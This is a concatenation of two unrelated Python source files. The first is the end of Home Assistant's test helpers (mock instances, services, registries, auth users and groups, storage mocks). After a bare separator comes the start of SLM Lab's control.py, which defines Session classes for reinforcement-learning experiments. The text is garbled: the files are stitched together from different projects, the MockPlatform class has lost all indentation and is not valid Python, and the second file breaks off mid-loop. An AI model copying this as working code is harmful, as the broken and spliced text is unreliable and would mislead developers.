    async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
        """Block until at most max_remaining_tasks remain.

        Based on HomeAssistant.async_block_till_done
        """
        # To flush out any call_soon_threadsafe
        await asyncio.sleep(0)
        start_time: float | None = None

        while len(self._pending_tasks) > max_remaining_tasks:
            pending: Collection[Awaitable[Any]] = [
                task for task in self._pending_tasks if not task.done()
            ]
            self._pending_tasks.clear()
            if len(pending) > max_remaining_tasks:
                remaining_pending = await self._await_count_and_log_pending(
                    pending, max_remaining_tasks=max_remaining_tasks
                )
                self._pending_tasks.extend(remaining_pending)

                if start_time is None:
                    # Avoid calling monotonic() until we know
                    # we may need to start logging blocked tasks.
                    start_time = 0
                elif start_time == 0:
                    # If we have waited twice then we set the start
                    # time
                    start_time = monotonic()
                elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
                    # We have waited at least three loops and new tasks
                    # continue to block. At this point we start
                    # logging all waiting tasks.
                    for task in pending:
                        _LOGGER.debug("Waiting for task: %s", task)
            else:
                self._pending_tasks.extend(pending)
                await asyncio.sleep(0)

    async def _await_count_and_log_pending(
        self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
    ) -> Collection[Awaitable[Any]]:
        """Block at most max_remaining_tasks remain and log tasks that take a long time.

        Based on HomeAssistant._await_and_log_pending
        """
        wait_time = 0

        return_when = asyncio.ALL_COMPLETED
        if max_remaining_tasks:
            return_when = asyncio.FIRST_COMPLETED

        while len(pending) > max_remaining_tasks:
            _, pending = await asyncio.wait(
                pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
            )
            if not pending or max_remaining_tasks:
                return pending
            wait_time += BLOCK_LOG_TIMEOUT
            for task in pending:
                _LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)

        return []

    hass.async_add_job = async_add_job
    hass.async_add_executor_job = async_add_executor_job
    hass.async_create_task = async_create_task
    hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
    hass._await_count_and_log_pending = types.MethodType(
        _await_count_and_log_pending, hass
    )

    hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}

    # Fixed test location/units so location-dependent tests are deterministic.
    hass.config.location_name = "test home"
    hass.config.config_dir = get_test_config_dir()
    hass.config.latitude = 32.87336
    hass.config.longitude = -117.22743
    hass.config.elevation = 0
    hass.config.time_zone = date_util.get_time_zone("US/Pacific")
    hass.config.units = METRIC_SYSTEM
    hass.config.media_dirs = {"local": get_test_config_dir("media")}
    hass.config.skip_pip = True

    hass.config_entries = config_entries.ConfigEntries(hass, {})
    hass.config_entries._entries = {}
    hass.config_entries._store._async_ensure_stop_listener = lambda: None

    # Load the registries
    if load_registries:
        await asyncio.gather(
            device_registry.async_load(hass),
            entity_registry.async_load(hass),
            area_registry.async_load(hass),
        )
        await hass.async_block_till_done()

    hass.state = ha.CoreState.running

    # Mock async_start
    orig_start = hass.async_start

    async def mock_async_start():
        """Start the mocking."""
        # We only mock time during tests and we want to track tasks
        with patch("homeassistant.core._async_create_timer"), patch.object(
            hass, "async_stop_track_tasks"
        ):
            await orig_start()

    hass.async_start = mock_async_start

    @ha.callback
    def clear_instance(event):
        """Clear global instance."""
        INSTANCES.remove(hass)

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)

    return hass
def async_mock_service(hass, domain, service, schema=None):
    """Set up a fake service & return a calls log list to this service."""
    calls = []

    @ha.callback
    def record_call(call):
        """Append the incoming service call to the log."""
        calls.append(call)

    hass.services.async_register(domain, service, record_call, schema=schema)

    return calls


mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
    """Set up a fake intent handler.

    Returns a list that records every intent object the handler receives.
    """
    intents = []

    class MockIntentHandler(intent.IntentHandler):
        # Handle only the requested intent type.
        intent_type = intent_typ

        async def async_handle(self, intent):
            """Handle the intent."""
            # NOTE: the `intent` parameter shadows the imported module here.
            intents.append(intent)
            return intent.create_response()

    intent.async_register(hass, MockIntentHandler())

    return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
    """Fire the MQTT message."""
    # Payloads are handled as bytes; encode str payloads for convenience.
    if isinstance(payload, str):
        payload = payload.encode("utf-8")
    msg = Message(topic, payload, qos, retain)
    hass.data["mqtt"]._mqtt_handle_message(msg)


fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
    """Fire a time changes event.

    Also runs (and cancels) any loop timers whose deadline is at or before
    the mocked `datetime_`; with fire_all=True every scheduled timer runs.
    """
    hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})

    for task in list(hass.loop._scheduled):
        if not isinstance(task, asyncio.TimerHandle):
            continue
        if task.cancelled():
            continue

        # Compare the mocked wall-clock offset against the timer's deadline
        # relative to the loop clock.
        mock_seconds_into_future = datetime_.timestamp() - time.time()
        future_seconds = task.when() - hass.loop.time()

        if fire_all or mock_seconds_into_future >= future_seconds:
            # Patch the tracker's notion of "now" so the handler sees the
            # mocked time instead of the real clock.
            with patch(
                "homeassistant.helpers.event.time_tracker_utcnow",
                return_value=date_util.as_utc(datetime_),
            ):
                task._run()
                task.cancel()


fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def load_fixture(filename):
    """Return the contents of tests/fixtures/<filename> as text."""
    fixture_path = pathlib.Path(__file__).parent / "fixtures" / filename
    return fixture_path.read_text(encoding="utf-8")
def mock_state_change_event(hass, new_state, old_state=None):
    """Mock state change event.

    Fires EVENT_STATE_CHANGED with the entity id and new state; old_state
    is included only when given.  The new state's context is reused.
    """
    event_data = {"entity_id": new_state.entity_id, "new_state": new_state}

    if old_state:
        event_data["old_state"] = old_state

    hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
    """Mock a component is setup.

    Raises AssertionError if the component was already marked as set up,
    so tests fail loudly on accidental double setup.
    """
    if component in hass.config.components:
        # Fix: the AssertionError was previously constructed but never
        # raised, so duplicate setups went completely unnoticed.
        raise AssertionError(f"Integration {component} is already setup")

    hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
    """Mock the Entity Registry.

    mock_entries: optional mapping of preloaded entries (presumably keyed
    by entity id — confirm against EntityRegistry.entities usage).
    """
    registry = entity_registry.EntityRegistry(hass)
    registry.entities = mock_entries or OrderedDict()
    # Indexes are derived from `entities`, so rebuild after replacing it.
    registry._rebuild_index()

    hass.data[entity_registry.DATA_REGISTRY] = registry
    return registry
def mock_area_registry(hass, mock_entries=None):
    """Mock the Area Registry.

    mock_entries: optional mapping of preloaded area entries.
    """
    registry = area_registry.AreaRegistry(hass)
    registry.areas = mock_entries or OrderedDict()
    hass.data[area_registry.DATA_REGISTRY] = registry
    return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
    """Mock the Device Registry.

    mock_entries / mock_deleted_entries: optional mappings of preloaded
    active and deleted device entries.
    """
    registry = device_registry.DeviceRegistry(hass)
    registry.devices = mock_entries or OrderedDict()
    registry.deleted_devices = mock_deleted_entries or OrderedDict()
    # Indexes are derived from the device mappings, so rebuild them.
    registry._rebuild_index()

    hass.data[device_registry.DATA_REGISTRY] = registry
    return registry
class MockGroup(auth_models.Group):
    """Mock a group in Home Assistant."""

    def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
        """Create a mock group; id is only forwarded when given."""
        group_kwargs = {"name": name, "policy": policy}
        if id is not None:
            group_kwargs["id"] = id
        super().__init__(**group_kwargs)

    def add_to_hass(self, hass):
        """Register this group on a hass instance's auth manager."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Register this group directly on an auth manager and return self."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._groups[self.id] = self
        return self
class MockUser(auth_models.User):
    """Mock a user in Home Assistant."""

    def __init__(
        self,
        id=None,
        is_owner=False,
        is_active=True,
        name="Mock User",
        system_generated=False,
        groups=None,
    ):
        """Create a mock user; id is only forwarded when given."""
        user_kwargs = {
            "is_owner": is_owner,
            "is_active": is_active,
            "name": name,
            "system_generated": system_generated,
            "groups": groups or [],
            "perm_lookup": None,
        }
        if id is not None:
            user_kwargs["id"] = id
        super().__init__(**user_kwargs)

    def add_to_hass(self, hass):
        """Register this user on a hass instance's auth manager."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Register this user directly on an auth manager and return self."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._users[self.id] = self
        return self

    def mock_policy(self, policy):
        """Install a permission policy on this user."""
        self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
    """Build an auth provider from config and register it on hass.auth."""
    provider = await auth_providers.auth_provider_from_config(
        hass, hass.auth._store, config
    )
    assert provider is not None, "Invalid config specified"

    providers = hass.auth._providers
    provider_key = (provider.type, provider.id)
    if provider_key in providers:
        raise ValueError("Provider already registered")

    providers[provider_key] = provider
    return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
    """Ensure an auth manager is considered loaded."""
    if auth_mgr._store._users is None:
        # An unloaded store has users=None; seed it with defaults.
        auth_mgr._store._set_defaults()
class MockModule:
    """Representation of a fake integration module."""

    # pylint: disable=invalid-name
    def __init__(
        self,
        domain=None,
        dependencies=None,
        setup=None,
        requirements=None,
        config_schema=None,
        platform_schema=None,
        platform_schema_base=None,
        async_setup=None,
        async_setup_entry=None,
        async_unload_entry=None,
        async_migrate_entry=None,
        async_remove_entry=None,
        partial_manifest=None,
    ):
        """Initialize the mock module."""
        self.__name__ = f"homeassistant.components.{domain}"
        self.__file__ = f"homeassistant/components/{domain}"
        self.DOMAIN = domain
        self.DEPENDENCIES = dependencies or []
        self.REQUIREMENTS = requirements or []
        # Overlay merged on top of the legacy manifest in mock_manifest().
        self._partial_manifest = partial_manifest

        # Only attach the optional schemas/hooks that were actually provided.
        optional_attrs = {
            "CONFIG_SCHEMA": config_schema,
            "PLATFORM_SCHEMA": platform_schema,
            "PLATFORM_SCHEMA_BASE": platform_schema_base,
            "async_setup": async_setup,
            "async_setup_entry": async_setup_entry,
            "async_unload_entry": async_unload_entry,
            "async_migrate_entry": async_migrate_entry,
            "async_remove_entry": async_remove_entry,
        }
        for attr_name, attr_value in optional_attrs.items():
            if attr_value is not None:
                setattr(self, attr_name, attr_value)

        if setup:
            # setup() runs in the executor, so wrap it in a plain function.
            self.setup = lambda *args: setup(*args)
        if setup is None and async_setup is None:
            # Neither hook supplied: default to an async setup reporting success.
            self.async_setup = AsyncMock(return_value=True)

    def mock_manifest(self):
        """Generate a mock manifest to represent this module."""
        return {
            **loader.manifest_from_legacy_module(self.DOMAIN, self),
            **(self._partial_manifest or {}),
        }
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
    """EntityPlatform with test-friendly defaults for every constructor arg."""

    def __init__(
        self,
        hass,
        logger=None,
        domain="test_domain",
        platform_name="test_platform",
        platform=None,
        scan_interval=timedelta(seconds=15),
        entity_namespace=None,
    ):
        """Initialize a mock entity platform.

        Any argument left at its default is replaced with a value the parent
        EntityPlatform constructor accepts.
        """
        if logger is None:
            logger = logging.getLogger("homeassistant.helpers.entity_platform")

        # Otherwise the constructor will blow up: a Mock platform returns a Mock
        # for PARALLEL_UPDATES, so force it to a real number first.
        if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
            platform.PARALLEL_UPDATES = 0

        super().__init__(
            hass=hass,
            logger=logger,
            domain=domain,
            platform_name=platform_name,
            platform=platform,
            scan_interval=scan_interval,
            entity_namespace=entity_namespace,
        )
class MockToggleEntity(entity.ToggleEntity):
    """Provide a mock toggle device that records every access in self.calls."""

    def __init__(self, name, state, unique_id=None):
        """Initialize the mock entity."""
        self._name = name or DEVICE_DEFAULT_NAME
        self._state = state
        self.calls = []

    @property
    def name(self):
        """Return the name of the entity if any."""
        self._record("name")
        return self._name

    @property
    def state(self):
        """Return the state of the entity if any."""
        self._record("state")
        return self._state

    @property
    def is_on(self):
        """Return true if entity is on."""
        self._record("is_on")
        return self._state == STATE_ON

    def turn_on(self, **kwargs):
        """Turn the entity on."""
        self._record("turn_on", kwargs)
        self._state = STATE_ON

    def turn_off(self, **kwargs):
        """Turn the entity off."""
        self._record("turn_off", kwargs)
        self._state = STATE_OFF

    def last_call(self, method=None):
        """Return the last recorded call, optionally filtered by method name."""
        if not self.calls:
            return None
        if method is None:
            return self.calls[-1]
        matching = (call for call in reversed(self.calls) if call[0] == method)
        return next(matching, None)

    def _record(self, method, kwargs=None):
        """Append a (method, kwargs) tuple to the call log."""
        self.calls.append((method, kwargs if kwargs is not None else {}))
class MockConfigEntry(config_entries.ConfigEntry):
    """Helper for creating config entries that adds some defaults."""

    def __init__(
        self,
        *,
        domain="test",
        data=None,
        version=1,
        entry_id=None,
        source=config_entries.SOURCE_USER,
        title="Mock Title",
        state=None,
        options=None,
        system_options=None,
        connection_class=config_entries.CONN_CLASS_UNKNOWN,
        unique_id=None,
        disabled_by=None,
    ):
        """Initialize a mock config entry.

        Bug fix: ``options`` and ``system_options`` previously defaulted to
        mutable ``{}`` literals shared by every instance; any mutation leaked
        between entries. They now default to None and get a fresh dict each.
        """
        kwargs = {
            "entry_id": entry_id or uuid_util.random_uuid_hex(),
            "domain": domain,
            "data": data or {},
            "system_options": system_options or {},
            "options": options or {},
            "version": version,
            "title": title,
            "connection_class": connection_class,
            "unique_id": unique_id,
            "disabled_by": disabled_by,
        }
        if source is not None:
            kwargs["source"] = source
        if state is not None:
            kwargs["state"] = state
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        hass.config_entries._entries[self.entry_id] = self

    def add_to_manager(self, manager):
        """Test helper to add entry to entry manager."""
        manager._entries[self.entry_id] = self
def patch_yaml_files(files_dict, endswith=True):
    """Patch load_yaml with a dictionary of yaml files.

    files_dict maps path (or path suffix) -> yaml text. Returns a patcher for
    the yaml loader's open().
    """
    # Suffix-match candidates, iterated shortest-first (sorted ascending by
    # length); empty when endswith matching is disabled.
    matchlist = sorted(files_dict.keys(), key=len) if endswith else []

    def mock_open_f(fname, **_):
        """Mock open() in the yaml module, used by load_yaml."""
        if isinstance(fname, pathlib.Path):
            fname = str(fname)

        # 1) Exact path match returns the mocked content.
        if fname in files_dict:
            _LOGGER.debug("patch_yaml_files match %s", fname)
            res = StringIO(files_dict[fname])
            setattr(res, "name", fname)
            return res

        # 2) Suffix match (endswith mode only).
        for ends in matchlist:
            if fname.endswith(ends):
                _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
                res = StringIO(files_dict[ends])
                setattr(res, "name", fname)
                return res

        # 3) Fallback for hass.components (i.e. services.yaml): real file.
        if "homeassistant/components" in fname:
            _LOGGER.debug("patch_yaml_files using real file: %s", fname)
            return open(fname, encoding="utf-8")

        # 4) Not found
        raise FileNotFoundError(f"File not found: {fname}")

    return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
    """Return an awaitable future resolved with a value or raising an exception."""
    future = asyncio.Future()
    if exception is None:
        future.set_result(return_value)
    else:
        future.set_exception(exception)
    return future
@contextmanager
def assert_setup_component(count, domain=None):
    """Collect valid configuration from setup_component.

    - count: The amount of valid platforms that should be setup
    - domain: The domain to count is optional. It can be automatically
      determined most of the time

    Use as a context manager around setup.setup_component
        with assert_setup_component(0) as result_config:
            setup_component(hass, domain, start_config)
            # using result_config is optional
    """
    config = {}

    async def mock_psc(hass, config_input, integration):
        """Mock the prepare_setup_component to capture config."""
        domain_input = integration.domain
        res = await async_process_component_config(hass, config_input, integration)
        # Record the validated config per domain (None on validation failure).
        config[domain_input] = None if res is None else res.get(domain_input)
        _LOGGER.debug(
            "Configuration for %s, Validated: %s, Original %s",
            domain_input,
            config[domain_input],
            config_input.get(domain_input),
        )
        return res

    assert isinstance(config, dict)
    with patch("homeassistant.config.async_process_component_config", mock_psc):
        yield config

    # After the with-block exits, verify the expected number of valid platforms.
    if domain is None:
        # Auto-detect the domain only when exactly one was processed.
        assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
            list(config.keys())
        )
        domain = list(config.keys())[0]

    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert (
        res_len == count
    ), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
    """Set up the recorder component against an in-memory database."""
    config = {**(add_config or {}), recorder.CONF_DB_URL: "sqlite://"}
    with patch("homeassistant.components.recorder.migration.migrate_schema"):
        assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
    """Set up the recorder component asynchronously against an in-memory database."""
    config = {**(add_config or {}), recorder.CONF_DB_URL: "sqlite://"}
    with patch("homeassistant.components.recorder.migration.migrate_schema"):
        assert await async_setup_component(
            hass, recorder.DOMAIN, {recorder.DOMAIN: config}
        )
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
    """Mock the DATA_RESTORE_CACHE with the given iterable of State objects."""
    key = restore_state.DATA_RESTORE_STATE_TASK
    data = restore_state.RestoreStateData(hass)
    now = date_util.utcnow()

    last_states = {}
    for state in states:
        restored_state = state.as_dict()
        # Round-trip attributes through JSON so they match what a real restore
        # (which reads serialized storage) would produce.
        restored_state["attributes"] = json.loads(
            json.dumps(restored_state["attributes"], cls=JSONEncoder)
        )
        last_states[state.entity_id] = restore_state.StoredState(
            State.from_dict(restored_state), now
        )
    data.last_states = last_states
    _LOGGER.debug("Restore cache: %s", data.last_states)
    # Duplicate entity_ids collapse into one dict key; catch that early.
    assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"

    hass.data[key] = data
class MockEntity(entity.Entity):
    """Mock Entity class.

    Any Entity property can be overridden by passing it as a keyword argument;
    unset properties fall back to the parent Entity default via _handle().
    """

    def __init__(self, **values):
        """Initialize an entity with property overrides."""
        self._values = values

        if "entity_id" in values:
            self.entity_id = values["entity_id"]

    @property
    def name(self):
        """Return the name of the entity."""
        return self._handle("name")

    @property
    def should_poll(self):
        """Return the state of the polling."""
        return self._handle("should_poll")

    @property
    def unique_id(self):
        """Return the unique ID of the entity."""
        return self._handle("unique_id")

    @property
    def state(self):
        """Return the state of the entity."""
        return self._handle("state")

    @property
    def available(self):
        """Return True if entity is available."""
        return self._handle("available")

    @property
    def device_info(self):
        """Info how it links to a device."""
        return self._handle("device_info")

    @property
    def device_class(self):
        """Info how device should be classified."""
        return self._handle("device_class")

    @property
    def unit_of_measurement(self):
        """Info on the units the entity state is in."""
        return self._handle("unit_of_measurement")

    @property
    def capability_attributes(self):
        """Info about capabilities."""
        return self._handle("capability_attributes")

    @property
    def supported_features(self):
        """Info about supported features."""
        return self._handle("supported_features")

    @property
    def entity_registry_enabled_default(self):
        """Return if the entity should be enabled when first added to the entity registry."""
        return self._handle("entity_registry_enabled_default")

    def _handle(self, attr):
        """Return the override for *attr* if given, else the parent class value."""
        if attr in self._values:
            return self._values[attr]
        return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
    """Mock storage.

    Data is a dict {'key': {'version': version, 'data': data}}

    Written data will be converted to JSON to ensure JSON parsing works.
    """
    if data is None:
        data = {}

    # Keep a reference to the real loader: mocked loads are routed through it
    # so store migration logic still runs.
    orig_load = storage.Store._async_load

    async def mock_async_load(store):
        """Mock version of load."""
        if store._data is None:
            # No data to load
            if store.key not in data:
                return None

            mock_data = data.get(store.key)

            if "data" not in mock_data or "version" not in mock_data:
                _LOGGER.error('Mock data needs "version" and "data"')
                raise ValueError('Mock data needs "version" and "data"')

            store._data = mock_data

        # Route through original load so that we trigger migration
        loaded = await orig_load(store)
        _LOGGER.info("Loading data for %s: %s", store.key, loaded)
        return loaded

    def mock_write_data(store, path, data_to_write):
        """Mock version of write data."""
        _LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
        # To ensure that the data can be serialized
        data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))

    async def mock_remove(store):
        """Remove data."""
        data.pop(store.key, None)

    # autospec=True makes side_effect receive the Store instance as first arg.
    with patch(
        "homeassistant.helpers.storage.Store._async_load",
        side_effect=mock_async_load,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store._write_data",
        side_effect=mock_write_data,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store.async_remove",
        side_effect=mock_remove,
        autospec=True,
    ):
        yield data
async def flush_store(store):
    """Make sure all delayed writes of a store are written."""
    if store._data is None:
        # Nothing pending: the store holds no in-flight data.
        return

    # Cancel the delay/final-write listeners, then force the write now.
    store._async_cleanup_final_write_listener()
    store._async_cleanup_delay_listener()
    await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
    """Return the system health info reported by *domain*."""
    info_callback = hass.data["system_health"][domain].info_callback
    return await info_callback(hass)
def mock_integration(hass, module, built_in=True):
    """Register *module* as a mocked integration on hass and return it."""
    package = loader.PACKAGE_BUILTIN if built_in else loader.PACKAGE_CUSTOM_COMPONENTS
    integration = loader.Integration(
        hass,
        f"{package}.{module.DOMAIN}",
        None,
        module.mock_manifest(),
    )

    def mock_import_platform(platform_name):
        """Simulate a platform that cannot be imported."""
        raise ImportError(
            f"Mocked unable to import platform '{platform_name}'",
            name=f"{integration.pkg_path}.{platform_name}",
        )

    integration._import_platform = mock_import_platform

    _LOGGER.info("Adding mock integration: %s", module.DOMAIN)
    hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
    hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module

    return integration
def mock_entity_platform(hass, platform_path, module):
    """Mock an entity platform.

    platform_path is in form light.hue. Will create platform hue.light.
    """
    domain, platform_name = platform_path.split(".")
    mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
    """Mock a platform.

    platform_path is in form hue.config_flow.
    """
    domain, _platform_name = platform_path.split(".")
    integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
    module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})

    if domain not in integration_cache:
        # Register a stub parent integration for the platform's domain.
        mock_integration(hass, MockModule(domain))

    _LOGGER.info("Adding mock integration platform: %s", platform_path)
    module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
    """Return a list that accumulates every fired *event_name* event."""
    captured = []

    @ha.callback
    def _capture(event):
        """Record one event."""
        captured.append(event)

    hass.bus.async_listen(event_name, _capture)
    return captured
@ha.callback
def async_mock_signal(hass, signal):
    """Return a list that accumulates the args of every dispatch to *signal*."""
    captured_calls = []

    @ha.callback
    def _capture(*args):
        """Record one dispatched signal's arguments."""
        captured_calls.append(args)

    hass.helpers.dispatcher.async_dispatcher_connect(signal, _capture)
    return captured_calls
class hashdict(dict):
    """
    Hashable dict implementation, suitable for use as a key into other dicts.

    >>> h1 = hashdict({"apples": 1, "bananas":2})
    >>> h2 = hashdict({"bananas": 3, "mangoes": 5})
    >>> h1+h2
    hashdict(apples=1, bananas=3, mangoes=5)
    >>> d1 = {}
    >>> d1[h1] = "salad"
    >>> d1[h1]
    'salad'
    >>> d1[h2]
    Traceback (most recent call last):
    ...
    KeyError: hashdict(bananas=3, mangoes=5)

    based on answers from
    http://stackoverflow.com/questions/1151658/python-hashable-dicts
    """

    def __key(self):
        # Canonical, order-independent view of the items, used for hash/repr.
        return tuple(sorted(self.items()))

    def __repr__(self):  # noqa: D105 no docstring
        return ", ".join(f"{k!s}={v!r}" for k, v in self.__key())

    def __hash__(self):  # noqa: D105 no docstring
        return hash(self.__key())

    def _blocked(self):
        # Shared rejection for every mutating operation.
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def __setitem__(self, key, value):  # noqa: D105 no docstring
        self._blocked()

    def __delitem__(self, key):  # noqa: D105 no docstring
        self._blocked()

    def clear(self):  # noqa: D102 no docstring
        self._blocked()

    def pop(self, *args, **kwargs):  # noqa: D102 no docstring
        self._blocked()

    def popitem(self, *args, **kwargs):  # noqa: D102 no docstring
        self._blocked()

    def setdefault(self, *args, **kwargs):  # noqa: D102 no docstring
        self._blocked()

    def update(self, *args, **kwargs):  # noqa: D102 no docstring
        self._blocked()

    # update is not ok because it mutates the object
    # __add__ is ok because it creates a new object
    # while the new object is under construction, it's ok to mutate it
    def __add__(self, right):  # noqa: D105 no docstring
        merged = hashdict(self)
        dict.update(merged, right)
        return merged
def assert_lists_same(a, b):
    """Assert two lists of dicts hold the same items, ignoring order."""
    counter_a = collections.Counter(hashdict(item) for item in a)
    counter_b = collections.Counter(hashdict(item) for item in b)
    assert counter_a == counter_b
|
control.py | '''
The control module
Creates and controls the units of SLM lab: Experiment, Trial, Session
'''
from copy import deepcopy
from importlib import reload
from slm_lab.agent import AgentSpace, Agent
from slm_lab.env import EnvSpace, make_env
from slm_lab.experiment import analysis, search
from slm_lab.experiment.monitor import AEBSpace, Body, enable_aeb_space
from slm_lab.lib import logger, util
from slm_lab.spec import spec_util
import os
import torch.multiprocessing as mp
class Session:
    '''
    The base unit of instantiated RL system.
    Given a spec,
    session creates agent(s) and environment(s),
    run the RL system and collect data, e.g. fitness metrics, till it ends,
    then return the session data.
    '''

    def __init__(self, spec, info_space, global_nets=None):
        self.spec = spec
        self.info_space = info_space
        self.index = self.info_space.get('session')
        util.set_logger(self.spec, self.info_space, logger, 'session')
        self.data = None
        self.eval_proc = None  # reference run_online_eval process

        # init singleton agent and env
        self.env = make_env(self.spec)
        body = Body(self.env, self.spec['agent'])
        util.set_rand_seed(self.info_space.get_random_seed(), self.env)
        util.try_set_cuda_id(self.spec, self.info_space)
        self.agent = Agent(self.spec, self.info_space, body=body, global_nets=global_nets)

        enable_aeb_space(self)  # to use lab's data analysis framework
        logger.info(util.self_desc(self))
        logger.info(f'Initialized session {self.index}')

    def try_ckpt(self, agent, env):
        '''Try to checkpoint agent and run_online_eval at the start, save_freq, and the end'''
        clock = env.clock
        tick = clock.get(env.max_tick_unit)
        to_ckpt = False
        # checkpoint only in training-like modes, at save_frequency multiples or the final tick
        if util.get_lab_mode() not in ('enjoy', 'eval') and tick <= env.max_tick:
            to_ckpt = (tick % env.save_frequency == 0) or tick == env.max_tick
            if env.max_tick_unit == 'epi':  # extra condition for epi
                to_ckpt = to_ckpt and env.done

        if to_ckpt:
            if analysis.new_best(agent):
                agent.save(ckpt='best')
            # run online eval for train mode
            if util.get_lab_mode() == 'train' and self.spec['meta'].get('training_eval', False):
                ckpt = f'epi{clock.epi}-totalt{clock.total_t}'
                agent.save(ckpt=ckpt)
                # set reference to eval process for handling
                self.eval_proc = analysis.run_online_eval(self.spec, self.info_space, ckpt)
            if tick > 0:  # nothing to analyze at start
                analysis.analyze_session(self)

    def run_episode(self):
        # one full episode: reset env/agent, step until done, ckpt opportunistically
        self.env.clock.tick('epi')
        logger.info(f'Running trial {self.info_space.get("trial")} session {self.index} episode {self.env.clock.epi}')
        reward, state, done = self.env.reset()
        self.agent.reset(state)
        while not done:
            self.try_ckpt(self.agent, self.env)
            self.env.clock.tick('t')
            action = self.agent.act(state)
            reward, state, done = self.env.step(action)
            self.agent.update(action, reward, state, done)
        self.try_ckpt(self.agent, self.env)  # final timestep ckpt
        self.agent.body.log_summary()

    def close(self):
        '''
        Close session and clean up.
        Save agent, close env.
        '''
        self.agent.close()
        self.env.close()
        logger.info('Session done and closed.')

    def run(self):
        # run episodes until the tick budget is exhausted or all envs are solved
        while self.env.clock.get(self.env.max_tick_unit) < self.env.max_tick:
            self.run_episode()
            if util.get_lab_mode() not in ('enjoy', 'eval') and analysis.all_solved(self.agent):
                logger.info('All environments solved. Early exit.')
                break
        if self.eval_proc is not None:  # wait for final eval before closing
            util.run_cmd_wait(self.eval_proc)
        self.data = analysis.analyze_session(self)  # session fitness
        self.close()
        return self.data
class SpaceSession(Session):
    '''Session for multi-agent/env setting'''

    def __init__(self, spec, info_space, global_nets=None):
        self.spec = spec
        self.info_space = info_space
        self.index = self.info_space.get('session')
        util.set_logger(self.spec, self.info_space, logger, 'session')
        self.data = None
        self.eval_proc = None  # reference run_online_eval process

        # build the AEB (agent-env-body) space instead of a singleton pair
        self.aeb_space = AEBSpace(self.spec, self.info_space)
        self.env_space = EnvSpace(self.spec, self.aeb_space)
        self.aeb_space.init_body_space()
        util.set_rand_seed(self.info_space.get_random_seed(), self.env_space)
        util.try_set_cuda_id(self.spec, self.info_space)
        self.agent_space = AgentSpace(self.spec, self.aeb_space, global_nets)

        logger.info(util.self_desc(self))
        logger.info(f'Initialized session {self.index}')

    def try_ckpt(self, agent_space, env_space):
        '''Try to checkpoint agent and run_online_eval at the start, save_freq, and the end'''
        # delegate to the base per-(agent, env) checkpoint logic for each body
        for agent in agent_space.agents:
